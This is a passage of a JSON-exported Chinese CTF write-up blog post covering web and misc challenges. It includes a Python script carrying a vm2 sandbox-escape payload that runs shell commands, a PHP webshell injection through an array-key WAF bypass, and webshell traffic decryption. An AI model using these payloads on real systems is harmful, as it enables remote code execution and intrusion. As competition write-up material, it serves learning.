src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"522\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/image3-1024x522.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1822\"  sizes=\"auto, (max-width: 
1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u7136\u540e\u66ff\u6362cookie\u8dd1\u811a\u672c\u5373\u53ef<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>import requests\n\nurl = 'http:\/\/116.236.144.37:27900\/vm2'\ndata = {\"code\":\"eval(\\\"const stack=()=>{new Error().stack;stack();};err = {};const handler = {getPr\\\"+\\\"ototypeOf(target) {(stack)();}};const proxiedErr = new Proxy(err, handler);try {throw proxiedErr;} catch ({constructor: c}) {c.constructor('return process')().mainModule.require('child_process').execSync('cat \/f*');}\\\")\"}\nheaders = {\n    \"Content-Type\": \"application\/json\",\n    \"Cookie\": \"rt_web_csrf_token=ct6wK4YrkN84eUiKXteHENamjzQh4qwgw5Mnwxjqp5vvbqQElt1YHKSpteC8dsS4; rt_web__jwt_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZjQyYjRhZTQ1N2FhMzEyNjE5ZTZhOWU2MTI1NzI4MjIiLCJ1c2VybmFtZSI6IjE1MzEwODE1OTgwIiwiZXhwIjoxNjg0NjQ2NjAxLCJlbWFpbCI6IjI0MjU0MDQyNDBAcXEuY29tIn0.n4edxXhQMx3waR-aWiL2Di8WhkW9mhVCNTgOg6gvCk4; connect.sid=s%3AnWhaRQblCwhal3RbKAv1tuAojCznvfdS.E17HsBqhQ7h5zxzRIKwHPnctzLFClG7U9LItEJSTpBg\"\n}\nresponse = requests.post(url, json=data, headers=headers)\nprint(response.text)<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">fun_java<\/h2>\n\n\n\n<p>Jackson\u8c03getter\uff0c\u7136\u540eTemplatesImpl\u547d\u4ee4\u6267\u884c\uff0c\u548c\u963f\u91cc\u4e91bypass_1\u5dee\u4e0d\u591a\uff0c\u4f46\u6211\u6ca1\u505a\u51fa\u6765<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">easy_log<\/h2>\n\n\n\n<p>\u8fd9\u4e2a\u9898\u86ee\u6709\u610f\u601d\u7684\uff0c\u9996\u5148\u67e5\u770b\u6e90\u7801\uff0c\u4f1a\u53d1\u73b0\u9898\u76ee\u4f1a\u7528\u4e00\u4e2aphp\u6587\u4ef6\u8bb0\u5f55\u4f60\u7684\u767b\u5f55\u65e5\u5fd7\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-50-1024x151.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"151\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-50-1024x151.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1823\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u4f60\u5982\u679c\u60f3\u901a\u8fc7\u4fee\u6539username\u6216\u8005password\u7684\u503c\u5199\u9a6c\u90fd\u662f\u4e0d\u592a\u73b0\u5b9e\u7684\uff0c\u56e0\u4e3apassword\u7684\u503c\u662f\u88abmd5\u540e\u5199\u5165\u7684\uff0c\u800cusername\u90a3\u91cc\u80fd\u8fc7\u6ee4\u7684\u90fd\u8fc7\u6ee4\u7684\u5dee\u4e0d\u591a\u4e86&lt;\uff0c\u5f15\u53f7\u5565\u7684\u90fd\u4e0d\u80fd\u51fa\u73b0\uff0c\u806a\u660e\u7684\u4eba\u53ef\u80fd\u4f1a\u60f3\u5230\u90a3\u4e2aip\u6216\u8005url\u80fd\u4e0d\u80fd\u5199\u9a6c\u5462\uff0c\u8fd9\u786e\u5b9e\u662f\u53ef\u4ee5\u7684\uff0c\u6211\u4eec\u53ef\u4ee5\u8fd9\u6837\u4f20\u503c\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-52-1024x484.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"484\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-52-1024x484.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1825\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-51-1024x185.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"185\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-51-1024x185.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1824\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u4e0d\u662f\u5199\u8fdbphp\u53bb\u4e86\u5417\uff0c\u600e\u4e48\u6ca1\u89e3\u6790\u5462\uff1f\u6211\u4eec\u67e5\u770b\u6e90\u7801\u53ef\u4ee5\u53d1\u73b0\uff0c\u9898\u76ee\u7684waf\u76f4\u63a5\u628a&lt;\u66ff\u6362\u6210&amp;lt;\uff0c\u8fd9\u73a9\u610f\u513f\u53ea\u662f\u5728html\u91cc\u770b\u8d77\u6765\u662f&lt;\uff0c\u5f53\u7136\u4e0d\u662f\u6b63\u786e\u7684\u8bed\u6cd5<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-53.png'><img class=\"lazyload lazyload-style-1\" 
src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"615\" height=\"118\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-53.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1826\"  sizes=\"auto, (max-width: 615px) 100vw, 615px\" \/><\/div><\/figure>\n\n\n\n<p>\u6240\u4ee5\u5176\u5b9e\u8def\u88ab\u5835\u6b7b\u7684\u5dee\u4e0d\u591a\u4e86\uff0c\u4f46\u8fd8\u6709\u4e00\u79cd\u795e\u5947\u7684\u505a\u6cd5\uff0c\u5c31\u662f\u4fee\u6539\u4f20\u53c2\u7684\u5c5e\u6027\uff0c\u628ausername=123\u6539\u6210username[123]=123\uff0c\u8fd9\u6837\u7684\u60c5\u51b5\u4e0b\u65e2\u6ca1\u6709\u6539\u53d8\u53c2\u6570\u7684\u540d\uff0c\u670d\u52a1\u5668\u53ef\u4ee5\u89e3\u6790\uff0c\u53c8\u7ed5\u8fc7\u4e86waf\uff0c\u56e0\u4e3awaf\u53ea\u5bf9\u53c2\u6570\u7684\u503c\u6709\u6548\uff0c\u5bf9\u53c2\u6570\u7684\u952e\u540d\uff08\u6570\u7ec4\u4e0b\u6807\uff09\u662f\u65e0\u6548\u7684<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-54-1024x71.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"71\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-54-1024x71.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1827\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u8fd9\u6837\u503c\u5b8c\u5168\u53ef\u63a7\u4e86\uff0c\u6240\u4ee5\u76f4\u63a5\u5199\u9a6c\u5373\u53ef<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>password=asd&amp;username&#91;&lt;?php system(base64_decode(Y2F0IC9TM3JlY3RfMVNfSDNyZQ)); ?>]=123<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-55-1024x94.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"94\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/1-55-1024x94.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1828\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<h1 class=\"wp-block-heading\">misc<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">good_http<\/h2>\n\n\n\n<p>\u5bf9\u4e24\u5f20\u56fe\u7247\u8fdb\u884c\u76f2\u6c34\u5370<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python3 bwmforpy3.py decode one.png theother.png flag.png<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' 
href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/flag.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"952\" height=\"1000\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/05\/flag.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1829\"  sizes=\"auto, (max-width: 952px) 100vw, 952px\" \/><\/div><\/figure>\n\n\n\n<p>\u5f97\u5230\u5bc6\u7801:XD8C2VOKEU<\/p>\n\n\n\n<p>\u89e3\u5f00\u538b\u7f29\u5305\u540e\u5373\u53ef\u83b7\u5f97flag<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">complicated_http<\/h2>\n\n\n\n<p>\u5bfc\u51fa\u6240\u6709\u6587\u4ef6\uff0c\u5728index(5).php\u91cc\u627e\u5230aes\u52a0\u5bc6\u7684key=9d239b100645bd71<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;?php\r\n@error_reporting(0);\r\nfunction Decrypt($data)  \r\n{  \r\n    $key=\"9d239b100645bd71\"; \r\n    $magicNum=hexdec(substr($key,0,2))%16; \r\n    $data=substr($data,0,strlen($data)-$magicNum); \r\n    return openssl_decrypt(base64_decode($data), \"AES-128-ECB\", $key,OPENSSL_PKCS1_PADDING);  \r\n}\r\n$post=Decrypt(\"\");\r\necho $post;\r\n?><\/code><\/pre>\n\n\n\n<p>\u7ee7\u7eed\u5bfb\u627eflag\u6587\u4ef6\uff0c\u5728shell(41).php\u91cc\u627e\u5230\u88ab\u52a0\u5bc6\u8fc7\u540e\u7684flag<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SBUlHlBCQI4q5uAXto4aSZGYIJqdgdOd\/zGfTGZaRaysJWFdgWdnnwRT5x7l\/bA6pUoX8pqJNgsNiviuI6anfGgdPjNiPkl3l4seUceQgOb99PwAD9JJwbia\/5GHwRTa8\ufffd\u0018\ufffd\ufffdp\u0015\ufffdw\ufffd \ufffd7<\/code><\/pre>\n\n\n\n<p>\u5728<a 
href=\"http:\/\/tool.chacuo.net\/cryptaes\">\u5728\u7ebf\u7f51\u7ad9<\/a>\u7528key\u5bf9\u5bc6\u6587\u8fdb\u884caes\u89e3\u5bc6\uff0c\u5f97\u5230\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>{\"status\":\"c3VjY2Vzcw==\",\"msg\":\"ZmxhZ3sxZWM1YmU1YS1hZmJkLTQ4NjctODAwYi0zZWI3MzliOWUzYmR9Cg==\"}<\/code><\/pre>\n\n\n\n<p>\u5bf9msg\u5b57\u6bb5base64\u89e3\u7801\u540e\u5f97\u5230flag:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>flag{1ec5be5a-afbd-4867-800b-3eb739b9e3bd}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u54ce\uff0c\u4e00\u5929\u5c31\u6211\u4e00\u4e2a\u4eba\u5728\u6253\uff0c\u961f\u53cb\u7ed9\u529b\u70b9\u5e94\u8be5\u5c31\u664b\u7ea7\u4e86\uff0c\u6c34\u5b50\u54e5\u80cc\u9505\uff0c\u4e0d\u8fc7\u81ea\u5df1\u83dc\u4e5f\u662f\u4e3b\u8981\u539f\u56e0\ud83d\ude04 crypto bird  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[9],"tags":[],"class_list":["post-1816","post","type-post","status-publish","format-standard","hentry","category-wp"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/1816","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=1816"}],"version-history":[{"count":2,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/1816\/revisions"}],"predecessor-version":[{"id":1834,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/1816\/revisions\/1834"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=1816"}],"wp:term":[{"taxonomy":"category","embeddabl
e":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=1816"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=1816"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}